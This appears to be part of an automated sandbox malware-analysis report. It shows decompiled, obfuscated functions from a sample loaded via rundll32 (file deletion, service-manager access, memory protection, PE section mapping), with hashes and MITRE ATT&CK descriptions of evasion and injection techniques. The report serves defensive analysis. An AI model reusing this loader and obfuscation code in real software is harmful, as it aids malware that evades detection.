Instruction Fuzzy Hash: 7CE1E774A00209DFEB05CF94C994AAEB7B6FF8C344F208559E909AB399D770ED42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 03681538, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E03681538(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t59;
				int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;

				_push(_a4);
				E0367FE29(_t59);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x73095a;
				_v28 = 0xd34a52;
				_v16 = 0xb3a153;
				_t77 = 0x73;
				_v16 = _v16 / _t77;
				_v16 = _v16 + 0x4fd2;
				_v16 = _v16 ^ 0xee3af97f;
				_v16 = _v16 ^ 0xee3510f4;
				_v20 = 0xee2064;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x88190a0a;
				_v12 = 0x72c7a5;
				_v12 = _v12 + 0x7839;
				_t78 = 0x77;
				_v12 = _v12 / _t78;
				_t79 = 0x76;
				_v12 = _v12 / _t79;
				_v12 = _v12 ^ 0x00040652;
				_v8 = 0x10c7fb;
				_t80 = 0x6c;
				_v8 = _v8 * 0x70;
				_v8 = _v8 << 8;
				_v8 = _v8 / _t80;
				_v8 = _v8 ^ 0x00c83f8f;
				E0366EB52(_t80, _t80, 0x2aa4bac1, 0x108, 0xa2289af1);
				_t75 = FindCloseChangeNotification(_a4); // executed
				return _t75;
			}

0x0368153e
0x03681543
0x03681548
0x0368154f
0x03681558
0x0368155f
0x0368156b
0x03681570
0x03681575
0x0368157c
0x03681583
0x0368158a
0x03681591
0x03681595
0x0368159c
0x036815a3
0x036815ad
0x036815b2
0x036815ba
0x036815bf
0x036815c4
0x036815cb
0x036815d6
0x036815e6
0x036815e9
0x036815f3
0x036815f6
0x0368160a
0x03681615
0x0368161a

APIs

FindCloseChangeNotification.KERNEL32(00040652), ref: 03681615

Strings

Zs, xrefs: 0368154F
d , xrefs: 0368158A

Memory Dump Source

Source File: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, Offset: 03660000, based on PE: true

Associated: 00000005.00000002.424823283.0000000003660000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.424848934.0000000003686000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3660000_rundll32.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID: Zs$d
API String ID: 2591292051-3879001491
Opcode ID: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
Instruction ID: db200a73e5b6045b6c4d8e7991b47345a0a8a67ff205afdae8e7da8eac003849
Opcode Fuzzy Hash: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
Instruction Fuzzy Hash: 19212AB5E40309FBEB04DFA5D94999EBBB1EB40314F10C09DE618BB290D7B96B548F84

Uniqueness

Uniqueness Score: -1.00%

Function 0366D061, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0366D061(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t69;

				_push(_a12);
				_t69 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0367FE29(_t54);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xa62646;
				_v32 = 0x27199b;
				_v20 = 0x942c55;
				_v20 = _v20 | 0xf0368afe;
				_v20 = _v20 << 0xa;
				_v20 = _v20 ^ 0xfbcaf84d;
				_v20 = _v20 ^ 0x217d6c33;
				_v16 = 0xf28622;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 | 0xeb4a9877;
				_v16 = _v16 ^ 0x2aded5e4;
				_v16 = _v16 ^ 0xc19eb21f;
				_v12 = 0x4a5837;
				_v12 = _v12 ^ 0xa3e571b7;
				_v12 = _v12 + 0xffff6305;
				_t65 = 0x6e;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x01794185;
				_v8 = 0xa209ee;
				_v8 = _v8 + 0x62d2;
				_v8 = _v8 ^ 0x3d892cf6;
				_v8 = _v8 | 0x5ca7d1ce;
				_v8 = _v8 ^ 0x7da8dabc;
				E0366EB52(_t65, _t65, 0x74c3d0b1, 0x1a1, 0xa2289af1);
				_t63 = DeleteFileW(_t69); // executed
				return _t63;
			}

0x0366d068
0x0366d06b
0x0366d06d
0x0366d070
0x0366d074
0x0366d075
0x0366d07a
0x0366d081
0x0366d087
0x0366d08e
0x0366d095
0x0366d09c
0x0366d0a3
0x0366d0a7
0x0366d0ae
0x0366d0b5
0x0366d0bc
0x0366d0c0
0x0366d0c7
0x0366d0ce
0x0366d0d5
0x0366d0dc
0x0366d0e3
0x0366d0ef
0x0366d0f7
0x0366d0fa
0x0366d101
0x0366d108
0x0366d10f
0x0366d116
0x0366d11d
0x0366d13c
0x0366d145
0x0366d14b

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0366D145

Strings

7XJ, xrefs: 0366D0D5
3l}!, xrefs: 0366D0AE

Memory Dump Source

Source File: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, Offset: 03660000, based on PE: true

Associated: 00000005.00000002.424823283.0000000003660000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.424848934.0000000003686000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3660000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: 3l}!$7XJ
API String ID: 4033686569-2205417827
Opcode ID: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
Instruction ID: 88e2aac65918ea9d9bbfae1829a58e22725e7d87e37390848125f4bc73ce1be0
Opcode Fuzzy Hash: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
Instruction Fuzzy Hash: 682145B5D01318AFDF08DFA4C98A9DEFBB0FF14304F108188E966A6210D7B85B558F91

Uniqueness

Uniqueness Score: -1.00%

Function 036845CA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E036845CA(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24, intOrPtr _a28, intOrPtr _a32, long _a36, intOrPtr _a40, long _a44, long _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t51;
				void* _t60;
				WCHAR* _t64;

				_push(_a48);
				_t64 = __ecx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E0367FE29(_t51);
				_v28 = 0x204d4f;
				_v24 = 0;
				_v20 = 0xd27984;
				_v20 = _v20 | 0x43788b11;
				_v20 = _v20 ^ 0x43f3df42;
				_v16 = 0xf976f1;
				_v16 = _v16 + 0xffff3d74;
				_v16 = _v16 | 0xfc5c4419;
				_v16 = _v16 ^ 0xfcfdb6fc;
				_v12 = 0xb7df7c;
				_v12 = _v12 + 0xffff3658;
				_v12 = _v12 * 0x13;
				_v12 = _v12 ^ 0x1f30f970;
				_v12 = _v12 ^ 0x12ab006a;
				_v8 = 0x8ba8ca;
				_v8 = _v8 | 0x62aa166a;
				_v8 = _v8 + 0xa2f6;
				_v8 = _v8 * 0x55;
				_v8 = _v8 ^ 0xc33acf6c;
				E0366EB52(__ecx, __ecx, 0xbc17bbde, 0x19f, 0xa2289af1);
				_t60 = CreateFileW(_t64, _a24, _a48, 0, _a44, _a36, 0); // executed
				return _t60;
			}

0x036845d2
0x036845d7
0x036845d9
0x036845dc
0x036845df
0x036845e2
0x036845e5
0x036845e8
0x036845eb
0x036845ee
0x036845f1
0x036845f4
0x036845f5
0x036845f7
0x036845f8
0x036845fd
0x03684607
0x0368460a
0x03684611
0x03684618
0x0368461f
0x03684626
0x0368462d
0x03684634
0x0368463b
0x03684642
0x0368465d
0x03684660
0x03684667
0x0368466e
0x03684675
0x0368467c
0x03684688
0x0368468b
0x0368469e
0x036846b5
0x036846bc

APIs

CreateFileW.KERNEL32(?,00000057,?,00000000,?,?,00000000), ref: 036846B5

Strings

OM , xrefs: 036845FD

Memory Dump Source

Source File: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, Offset: 03660000, based on PE: true

Associated: 00000005.00000002.424823283.0000000003660000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.424848934.0000000003686000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3660000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: OM
API String ID: 823142352-4198367855
Opcode ID: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
Instruction ID: 3581b482429b22799e8cb14ddc48560b991952b7e6f5eb2a7d092c2b763e29bb
Opcode Fuzzy Hash: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
Instruction Fuzzy Hash: A421EE72801249BBCF05DFA9CE45CDEBFB5EF88304F508199F914A6220D3768A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 10002690, Relevance: 3.1, APIs: 2, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E10002690(intOrPtr __ecx, intOrPtr* _a4, void** _a8) {
				long _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				int _t67;

				_v28 = __ecx;
				if(_a8[2] != 0) {
					if((_a8[3] & 0x02000000) == 0) {
						asm("sbb ecx, ecx");
						_v16 =  ~( ~(_a8[3] & 0x20000000));
						asm("sbb eax, eax");
						_v24 =  ~( ~(_a8[3] & 0x40000000));
						asm("sbb edx, edx");
						_v12 =  ~( ~(_a8[3] & 0x80000000));
						_v20 =  *((intOrPtr*)((_v16 << 4) + 0x1008444c + _v24 * 8 + _v12 * 4));
						if((_a8[3] & 0x04000000) != 0) {
							_v20 = _v20 | 0x00000200;
						}
						_t67 = VirtualProtect( *_a8, _a8[2], _v20,  &_v8); // executed
						if(_t67 != 0) {
							return 1;
						} else {
							return 0;
						}
					}
					if( *_a8 == _a8[1] && (_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x30) || _a8[2] %  *(_a4 + 0x30) == 0)) {
						VirtualFree( *_a8, _a8[2], 0x4000); // executed
					}
					return 1;
				}
				return 1;
			}

0x10002696
0x100026a0
0x100026b8
0x10002722
0x10002726
0x10002736
0x1000273a
0x1000274b
0x1000274f
0x10002768
0x10002776
0x10002781
0x10002781
0x10002799
0x100027a1
0x00000000
0x100027a3
0x00000000
0x100027a3
0x100027a1
0x100026c5
0x10002704
0x10002704
0x00000000
0x1000270a
0x00000000

APIs

VirtualFree.KERNELBASE(?,00000000,00004000), ref: 10002704

Memory Dump Source

Source File: 00000005.00000002.425480374.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.425473612.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
Instruction ID: e47a27f64338b3e84d430cb899d867ed3d67d72a97b2c0655aeaec8263a425f7
Opcode Fuzzy Hash: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
Instruction Fuzzy Hash: 8841B77461410AAFEB48CF58C490BA9B7B2FB88364F14C659EC1A9F355C731EE41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0367648A, Relevance: 1.6, APIs: 1, Instructions: 50
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0367648A(long __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, long _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				void* _t49;
				long _t52;

				_push(_a16);
				_t52 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0367FE29(_t41);
				_v12 = 0x3cd3f;
				_v12 = _v12 << 3;
				_v12 = _v12 | 0xc677f757;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0188bcff;
				_v20 = 0x40fc9e;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x040306b1;
				_v16 = 0x159e9f;
				_v16 = _v16 + 0xffffd0d5;
				_v16 = _v16 * 0x33;
				_v16 = _v16 ^ 0x04433238;
				_v8 = 0x8a430d;
				_v8 = _v8 + 0xffffdfbc;
				_v8 = _v8 | 0x5356d001;
				_v8 = _v8 + 0x638e;
				_v8 = _v8 ^ 0x53d0144a;
				E0366EB52(__ecx, __ecx, 0x958aafc8, 0x1c3, 0xa2289af1);
				_t49 = RtlAllocateHeap(_a12, _a16, _t52); // executed
				return _t49;
			}

0x03676491
0x03676494
0x03676496
0x03676499
0x0367649c
0x036764a0
0x036764a1
0x036764a6
0x036764b0
0x036764b4
0x036764bb
0x036764bf
0x036764c6
0x036764cd
0x036764d1
0x036764d8
0x036764df
0x036764fa
0x036764fd
0x03676504
0x0367650b
0x03676512
0x03676519
0x03676520
0x03676534
0x03676543
0x03676549

APIs

RtlAllocateHeap.NTDLL(040306B1,?,ED94606E,?,?,?,?,?,?,?,?,?,?,?), ref: 03676543

Memory Dump Source

Source File: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, Offset: 03660000, based on PE: true

Associated: 00000005.00000002.424823283.0000000003660000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.424848934.0000000003686000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3660000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
Instruction ID: 65084e7cc8d6bfcc845722305180ce6e2af1881f49c8b91a07bb5f48de3a1382
Opcode Fuzzy Hash: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
Instruction Fuzzy Hash: B21100B6C0121DFBDF06DFA5D9098CEBBB4FB00314F108598E821AA250E3B59B249F91

Uniqueness

Uniqueness Score: -1.00%

Function 0367E8B6, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0367E8B6(void* __ecx, void* __edx, intOrPtr _a4, int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t29;
				void* _t37;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E0367FE29(_t29);
				_v20 = 0xc8e76b;
				_v20 = _v20 | 0x270203a1;
				_v20 = _v20 ^ 0x27c97096;
				_v16 = 0x55aebc;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00171a80;
				_v12 = 0xfad6fe;
				_v12 = _v12 ^ 0xd14a4d1d;
				_v12 = _v12 ^ 0xd1b10da7;
				_v8 = 0x428060;
				_v8 = _v8 * 0x54;
				_v8 = _v8 ^ 0x15de1a76;
				E0366EB52(__ecx, __ecx, 0x3c0b385, 0x1bc, 0x1f76e49f);
				_t37 = OpenSCManagerW(0, 0, _a12); // executed
				return _t37;
			}

0x0367e8bd
0x0367e8c2
0x0367e8c5
0x0367e8c6
0x0367e8ca
0x0367e8cb
0x0367e8d0
0x0367e8da
0x0367e8e1
0x0367e8e8
0x0367e8ef
0x0367e8f3
0x0367e8fa
0x0367e901
0x0367e908
0x0367e90f
0x0367e92a
0x0367e92d
0x0367e941
0x0367e94e
0x0367e954

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,27C97096,?,?,?,?,?,?,?,?,?,?,?), ref: 0367E94E

Memory Dump Source

Source File: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, Offset: 03660000, based on PE: true

Associated: 00000005.00000002.424823283.0000000003660000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.424848934.0000000003686000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3660000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
Instruction ID: b3812c85029499460e39bf2041330a53d5eda347fc5a28c74fe7abdd83c48802
Opcode Fuzzy Hash: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
Instruction Fuzzy Hash: 3A11157190221DFB9B04EFA89A468DEBFB4EB04304F108588E825A6211D3B18B149B95

Uniqueness

Uniqueness Score: -1.00%

Function 0367D11A, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0367D11A() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t39;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x78f5c7;
				_v32 = 0xa12bb9;
				_v28 = 0x4eca09;
				_v8 = 0x8b256f;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x4a7d0011;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00073d60;
				_v20 = 0x1e549a;
				_v20 = _v20 + 0xffffad33;
				_v20 = _v20 ^ 0x00134b4f;
				_v16 = 0x8dd9dd;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x0460bc3c;
				_v12 = 0x358059;
				_v12 = _v12 + 0xb97b;
				_v12 = _v12 ^ 0x003502df;
				E0366EB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
				ExitProcess(0);
			}

0x0367d120
0x0367d124
0x0367d12b
0x0367d132
0x0367d139
0x0367d140
0x0367d144
0x0367d14b
0x0367d14f
0x0367d156
0x0367d15d
0x0367d164
0x0367d16b
0x0367d172
0x0367d176
0x0367d17d
0x0367d184
0x0367d18b
0x0367d1ac
0x0367d1b6

APIs

ExitProcess.KERNEL32(00000000), ref: 0367D1B6

Memory Dump Source

Source File: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, Offset: 03660000, based on PE: true

Associated: 00000005.00000002.424823283.0000000003660000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.424848934.0000000003686000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3660000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction ID: 1f913a59e8becfc2127a31cc17ca15852d3c291f9ccc01d06b04488c726fe4ed
Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction Fuzzy Hash: 0A1100B1C4030CEBDB44DFE5DA4A69EBBB0EB00748F108588D521B6240D3B89A489F90

Uniqueness

Uniqueness Score: -1.00%

Function 100024D0, Relevance: 1.4, APIs: 1, Instructions: 115
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E100024D0(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t76;
				void* _t127;

				_v28 = __ecx;
				_v20 =  *((intOrPtr*)(_a16 + 4));
				_v24 =  *_a16 + ( *( *_a16 + 0x14) & 0x0000ffff) + 0x18;
				_v8 = 0;
				while(_v8 < ( *( *_a16 + 6) & 0x0000ffff)) {
					if( *(_v24 + 0x10) != 0) {
						if(E100024A0(_v28, _a8,  *((intOrPtr*)(_v24 + 0x14)) +  *(_v24 + 0x10)) != 0) {
							_t76 = VirtualAlloc(_v20 +  *((intOrPtr*)(_v24 + 0xc)),  *(_v24 + 0x10), 0x1000, 4); // executed
							_v12 = _t76;
							if(_v12 != 0) {
								_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
								E10002320(_v12, _a4 +  *((intOrPtr*)(_v24 + 0x14)),  *(_v24 + 0x10));
								_t127 = _t127 + 0xc;
								 *((intOrPtr*)(_v24 + 8)) = _v12;
								L1:
								_v8 = _v8 + 1;
								_v24 = _v24 + 0x28;
								continue;
							}
							return 0;
						}
						return 0;
					}
					_v16 =  *((intOrPtr*)(_a12 + 0x38));
					if(_v16 <= 0) {
						L8:
						goto L1;
					}
					_v12 =  *0x10047220(_v20 +  *((intOrPtr*)(_v24 + 0xc)), _v16, 0x1000, 4);
					if(_v12 != 0) {
						_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
						 *((intOrPtr*)(_v24 + 8)) = _v12;
						E100022D0(_v12, 0, _v16);
						_t127 = _t127 + 0xc;
						goto L8;
					}
					return 0;
				}
				return 1;
			}

0x100024d6
0x100024df
0x100024f4
0x100024f7
0x10002512
0x1000252b
0x100025ae
0x100025cc
0x100025d2
0x100025d9
0x100025e8
0x10002600
0x10002605
0x1000260e
0x10002500
0x10002506
0x1000250f
0x00000000
0x1000250f
0x00000000
0x100025db
0x00000000
0x100025b0
0x10002533
0x1000253a
0x1000258e
0x00000000
0x1000258e
0x10002557
0x1000255e
0x10002570
0x10002579
0x10002586
0x1000258b
0x00000000
0x1000258b
0x00000000
0x10002560
0x00000000

APIs

VirtualAlloc.KERNEL32(?,00000000,00001000,00000004), ref: 100025CC

Memory Dump Source

Source File: 00000005.00000002.425480374.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.425473612.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d2bbee85c6cabd151e34b26d14f83d277689191624d3873c1df0f1bcce928bde
Instruction ID: f227e8c1e280d8d0b8d11f9a2f1445d4c625449e48c39147985fdcb30a9e5b67
Opcode Fuzzy Hash: d2bbee85c6cabd151e34b26d14f83d277689191624d3873c1df0f1bcce928bde
Instruction Fuzzy Hash: FE51E9B4A0010AEFDB04CF94C990AAEB7F1FF48345F248598E905AB345D370EE91CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0368061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0368061D(signed int __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				int _t53;
				WCHAR* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0367FE29(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xcd60b7;
				_v12 = 0x7257ab;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0x8f69;
				_v12 = _v12 * 0x4c;
				_v12 = _v12 ^ 0x410f7a13;
				_v8 = 0x7b4696;
				_v8 = _v8 + 0xffff4950;
				_v8 = _v8 | 0x2a0f624b;
				_v8 = _v8 * 0x3a;
				_v8 = _v8 ^ 0xa0f3ec54;
				_v20 = 0x8a2161;
				_v20 = _v20 + 0xffff45ea;
				_v20 = _v20 ^ 0x1b6c7fa6;
				_v20 = _v20 ^ 0x1be8dede;
				_v16 = 0xdcc12a;
				_v16 = _v16 + 0xb9f4;
				_v16 = _v16 + 0xffffcfef;
				_v16 = _v16 ^ 0x00d9de04;
				E0366EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
				_t53 = lstrcmpiW(_a4, _t56); // executed
				return _t53;
			}

0x03680624
0x03680627
0x03680629
0x0368062c
0x0368062f
0x03680630
0x03680631
0x03680636
0x0368063d
0x03680644
0x0368064b
0x0368064f
0x03680667
0x0368066a
0x03680671
0x03680678
0x0368067f
0x0368068b
0x0368068e
0x03680695
0x0368069c
0x036806a3
0x036806aa
0x036806b1
0x036806b8
0x036806bf
0x036806c6
0x036806d9
0x036806e5
0x036806eb

APIs

lstrcmpiW.KERNEL32(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 036806E5

Memory Dump Source

Source File: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, Offset: 03660000, based on PE: true

Associated: 00000005.00000002.424823283.0000000003660000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.424848934.0000000003686000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3660000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction ID: d2d2b1f0630fa6096a77f0da09432d5fc5db64c8dc3ff327791c346dd35bc624
Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction Fuzzy Hash: 66210FB5C0130AABCF14DFA9D98999EBFB5FB20354F108298E529A6251D3B58B04CB90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
